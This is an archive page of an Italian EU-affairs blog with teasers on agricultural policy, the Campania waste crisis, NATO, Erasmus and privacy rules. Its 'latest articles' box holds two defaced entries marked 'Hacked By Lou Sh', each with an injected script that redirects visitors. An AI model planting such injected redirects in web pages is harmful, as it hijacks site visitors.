EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Novembre 2010
it

Nell’immediato dopoguerra, quando trovare qualcosa da mangiare era il principale problema quotidiano, i paesi membri della Comunità europea adottarono ogni sorta di programma per assistere e incoraggiare agricoltori e allevatori a produrre di più. Nel corso degli anni Cinquanta e nel periodo successivo, la produzione continuò ad aumentare nonostante la manodopera fosse attirata da nuovi lavori nelle città e gli agro allevatori stessero diventando sempre più capaci.

E’ su questo sfondo che si inquadra la Politica agricola comune (PAC), istituita nel 1962 e formalizzata nel 1970. Dalla sua formalizzazione e con il progressivo aumento dei prezzi avvenuta negli anni Settanta, tutta la produzione alimentare europea divenne troppo costosa per competere su un (...)

OGM
it

La Commissione europea, valutando la situazione dei rifiuti in Campania, sottolinea che il caos di questi giorni “dimostra che le autorità italiane non hanno ancora preso tutte le misure necessarie per giungere a una soluzione definitiva e adeguata del problema".

Questo significa, prosegue la Commissione, che "le autorità regionali non sono in grado di attuare un programma che garantisca lo smaltimento delle ecoballe, né tantomeno quello dei rifiuti prodotti su base quotidiana". Secondo Bruxelles, "la situazione odierna non è cambiata rispetto a quando la (...)

it

Dal 1945 sino all’inizio del 1953 l’Europa occidentale visse sotto la pesante ombra della guerra e nella previsione angosciosa di un’altra. Ciononostante, con la morte di Stalin e la fine della guerra in Corea, l’Europa entrò in un periodo di sorprendente stabilità. La rete di alleanze, agenzie e accordi internazionali come il Consiglio d’Europa, la CECA, l’Unione Europea dei pagamenti posero il seme di un nuovo e stabile sistemi di relazioni. In realtà, la “questione tedesca” e con essa la formazione di un Comunità europea di difesa, che avrebbe dovuto essere il perno dello sviluppo politico dell’Europa, rimasero irrisolti

La posizione ufficiale dell’Occidente era che le due Germanie formatesi nel 1949 dovessero essere riunite in un unico Stato democratico e sarebbe dovuto passare inevitabilmente con il riarmo dell’esercito tedesco ed il suo ingresso nella NATO. Quando, nel settembre del 1950, il segretario di (...)

it

Modificata nella legislazione Europea la direttiva in materia di congedo di maternità minimo: la madri avranno diritto ad un’ astensione dal lavoro da 14 a 20 settimane, tutte remunerate al 100% dello stipendio. Inoltre, i deputati hanno anche approvato l'introduzione del congedo di paternità, di almeno due settimane. Il Parlamento si pronuncerà definitivamente sulla questione nella primavera del 2011.

Bisognerà attendere la primavera del 2011 per vedere scritta, negli atti del Parlamento Europeo, l’ultima parola sulla questione del congedo di maternità minimo. Tra i Paesi dell’Unione esistono differenze sostanziali in questo campo. A seconda della Nazione in cui si vive si ha diritto a (...)

3
it

Portare l'Europa fuori dalla crisi e creare le condizioni per una crescita sostenibile e una maggiore occupazione, accrescendo il ruolo dell'Unione europea nel contesto mondiale e rendendo massimamente efficaci le politiche e le normative comunitarie. Sono queste le priorità del Programma di lavoro per il 2011 adottato lo scorso 27 ottobre dalla Commissione europea.

Il modello di crescita che si vuole perseguire è quello già declinato nella strategia Europa 2020, quindi una crescita sostenibile, intelligente ed inclusiva. Questo obiettivo passa anche per lo sviluppo del mercato unico europeo, il cui potenziale è in grado di distogliere i singoli Stati dalle (...)

it

Il primo piano concreto per l’integrazione economica europea, cioè l’iniziativa del Benelux, che era rivolta all’Olanda e al Lussemburgo, ma che in origine avrebbe dovuto coinvolgere anche la Francia, ebbe inizio con la convezione doganale di Londra del settembre 1944, e alla fine del 1949 sarebbe diventato una zona di libero scambio in piena regola. Le prime mosse in direzione del libero mercato che vennero compiute nei decenni successivi non sarebbero bastate da sole ad acquistare lo slancio necessario per la propria realizzazione se non ci fosse stata l’impressione che si trattava di un avvicinamento a un ideale più alto, quello di una Comunità Europea.

Uno dei momenti più importanti che portarono all’avvicinamento a questo ideale fu la redazione del Tratto di Maastricht nel 1992. Nel campo economico l’entrata in vigore del trattato fornì la creazione dell’Istituto monetario europeo ed entro il 1 gennaio 1999 sarebbe nata da esso la Banca centrale (...)

it

Il progetto European Region Action Scheme for the Mobility of University Students, meglio conosciuto con l’acronimo Erasmus, nasce nel 1987 per opera della Comunità Europea e sancisce la possibilità di uno studente universitario “europeo” di effettuare in una università straniera un periodo di studio legalmente riconosciuto dalla propria università. Il nome del programma deriva dall'umanista e teologo olandese Erasmo da Rotterdam che nel XV secolo viaggiò diversi anni in tutta Europa per comprenderne le differenti culture. Il progetto fu creato per educare le future generazioni di cittadini all'idea di appartenenza a quella che sarà poi chiamata Unione Europea. Dalla sua creazione si è giunti a mobilitare all'interno della comunità europea circa 2 milioni di studenti.

Per quel che riguarda l’Italia, a partire dal 2008 quasi 200.000 studenti universitari si sono recati all’estero grazie a una borsa di studio dell’Unione europea, battendo così, ogni record rispetto agli anni precedenti. C’è stato infatti, un aumento dell’8,7% delle partenze per un totale di più di (...)

it

Dovremo un giorno rinunciare all’internet neutrale e aperto a cui siamo ormai abituati? Forse sì. Mentre sempre più persone navigano su internet, iniziano ad emergere problemi di gestione del traffico in rete con un rischio di congestione dei dati. E gli internet provider stanno già iniziando a (...)

it

È giusto o no dotare gli aerei italiani di bombe da poter sganciare in caso di attacco da parte dei Talebani? È quanto si sono chiesti in questi giorni dapprima il Ministro La Russa, che non ha voluto decidere da solo, poi la Camera e il Senato, interrogati dallo stesso Ministro, e ora il Governo, dopo che le due audizioni sono terminate senza un accordo. Adesso noi lo domandiamo a voi: pensate sia opportuno provvedere all’equipaggiamento degli AMX con delle bombe?

Fa ancora discutere in Europa la questione sollevata dal Ministro della Difesa Ignazio La Russa a seguito dell’ennesimo attentato subito dai nostri soldati in Afghanistan, in cui hanno perso la vita quattro alpini. Il problema ruota tutto attorno ad una domanda cui ancora nessuno si è sentito di (...)

it

L’EPSO (European Communities Personnel Selection Office), che ha sede a Bruxelles, fu creato il 26 luglio 2002 ed è operativo dal 1 gennaio 2003.

L’Ufficio europeo per la selezione del personale (EPSO) ha pubblicato il bando di concorso per assistenti di segreteria. Il bando si rivolge in particolare a giovani all’inizio della loro carriera professionale e interessati a lavorare nel contesto internazionale. Le istituzioni europee cercano (...)

it

“Questo è solo il primo passo di un importante cammino che inizia oggi e spero possa non concludersi mai. Le scoperte scientifiche aiutano gli uomini a capire meglio il mondo in cui vivono e quindi ad avere controllo sulla realtà. Il Cern ha dimostrato che ora è anche possibile studiare e manipolare l’anti-materia”. Così parla dal sito del Cern Joel Fajans. Che rilancia: “ Con lo studio dell’ anti-materia potremmo aprire la strada alla scoperta di universi paralleli al nostro”.

Dopo mesi di intenso lavoro e ricerche difficili anche solo da immaginare per la maggior parte degli esseri umani, il Cern di Ginevra ha raccolto i frutti di tanto impegno raggiungendo due importantissimi traguardi nella storia delle scoperte scientifiche in pochi giorni. Il 7 novembre, i (...)

it

Il progetto, oltre a migliorare la vita in società delle persone con handicap, contribuirà anche al miglioramento dell’economia.

L’Unione Europea ha comunicato gli obiettivi per il prossimo decennio per abbattere le barriere che impediscono alle persone con disabilità di essere pienamente integrate. Nell’Unione europea sono circa 80 milioni le persone affette da disabilità lieve o grave che ogni giorno devono confrontarsi (...)

it

Dal 4 aprile 1949, il mondo, o almeno la sua zona occidentale, è più sicura. In quel giorno piovigginoso di Brussels, i diversi capi di stato e presidenti del consiglio europeo e nord-americani riportarono un po’ di sole nell’Europa devastata dal secondo conflitto mondiale, firmando il North Atlantic Treaty Organization, meglio conosciuto con l’acronimo NATO. L’Alleanza Atlantica è una alleanza militare intergovernativa basata sul Tratto Nord Atlantico con base a Brussels, Belgio, e l’organizzazione costituisce un sistema di difesa collettiva dove gli stati membri firmatari sono d’accordo in un mutuo soccorso in risposta ad un attacco esterno.

Con la crisi di Berlino, agli occhi dell’opinione pubblica europea e americana si presentarono diverse conseguenze. In primis, la crisi obbligò gli USA a impegnarsi per la prima volta a mantenere una consistente presenza militare in Europa a tempo indeterminato per poter difendere gli europei da (...)

it

Il “Diritto ad essere dimenticati” e una politica di protezione della privacy più severa a tutela dei cittadini, sono solo due delle novità studiate per aiutare gli utilizzatori di Internet a proteggere i propri dati nella rete. In più, la Commissione apre alla comunicazione con i cittadini attraverso l’apertura di un’area di scambio di opinioni sul tema.

La crescita dell’uso di Internet e dei Social Network in maniera particolare sta creando non pochi problemi alla privacy di molti cittadini, ignari dei pericoli che si nascondono dietro ad un semplice click dei loro mouse. Per questo l’UE, è stata impegnata nell’ultimo periodo con i lavori per (...)

it

Si sono svolti lo scorso 18 e 19 novembre i lavori del Club di Venezia nella magnifica cornice della Biblioteca Marciana davanti a Palazzo Ducale. Il Club di Venezia rappresenta un'importante occasione di collaborazione e scambio di best practice tra addetti ai lavori; è un organismo informale attivo dal 1985 che riunisce i responsabili della comunicazione istituzionale degli Stati dell’UE (membri e candidati all’adesione) e delle istituzioni comunitarie (Commissione, Parlamento e Consiglio). Membro per l’Italia è il Dipartimento Politiche Comunitarie, responsabile nazionale del coordinamento della comunicazione sull’Europa. Il Club si riunisce due volte l’anno per discutere argomenti di interesse comune, scambiare informazioni sui metodi adottati, pianificare e attuare campagne di informazione pubbliche. Le due sessioni annuali si tengono in primavera, solitamente nel paese che detiene la Presidenza del Consiglio UE, e in autunno a Venezia, dove il Club è stato fondato.

La sessione del Club è stata dedicata al tema di "come comunicare l’Europa" nella dimensione multilevel (UE, Stati e territorio) e nel confronto con la trasformazione del sistema mediatico verso nuovi linguaggi e nuove opportunità di interattività con i cittadini e le imprese. La due-giorni è stata (...)

it

Un’opportunità europea per i laureati in area economico-giuridica patrocinata delle quattro principali realtà universitarie della Capitale.

Oggi segnaliamo a tutti gli universitari laureati e laureandi il Master in “Esperto finanziamenti europei”. Giunto alla seconda edizione, in partnership con le Università di Roma "La Sapienza", “Tor Vergata”, “Roma Tre” e “LUISS”, insieme al Dipartimento per le Politiche Comunitarie, questo Master di II (...)

it

La delegazione europea boccia la Campania per la gestione dei rifiuti.

Sulla questione dei rifiuti a Napoli ci eravamo lasciati con l’annuncio di un imminente sopralluogo degli ispettori della Commissione europea sul terreno. La visita c’è stata infine gli scorsi 22-23 novembre: si è trattato di un’ispezione ufficiale guidata dalla responsabile della direzione generale (...)

it

Con l’avvicinarsi delle festività natalizie in tutta Europa è scattata l’allerta per il probabile verificarsi di attacchi terroristici. Proprio in considerazione di questo è stata recentemente adottata dalla Commissione una nuova strategia di sicurezza dell’UE che prevede una serie di misure (...)

it

Nel gennaio del 1997, undici mesi prima della ratifica del Protocollo di Kyoto, un trattato nato per far fronte alle trasformazioni climatiche, il mondo intero e gli stati membri dell’Unione Europea furono richiamati da diversi metereologi e studiosi di settore ad affrontare una delle grandi sfide del ventunesimo secolo: il cambiamento climatico. Infatti, in poco tempo, e nel solo 1998, il fenomeno climatico “El Nino” provocherà ben 32 mila vittime e circa 100 milioni di alluvionati. Le conseguenze umane ed economiche del disastro permisero a questo argomento di uscire dai salotti degli studiosi e diventare così materia di dibattito politico e pubblico.

In realtà, non è solo alle soglie del nuovo millennio che l’Europa si trova ad affrontare il tema dell’ambiente. La storia d’Europa è anche storia di disastri ambientali: il 26 aprile 1986, alle ore 1.23, uno dei quattro giganteschi reattori di grafite dell’impianto nucleare di Cernobyl, in Ucraina, (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato



Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France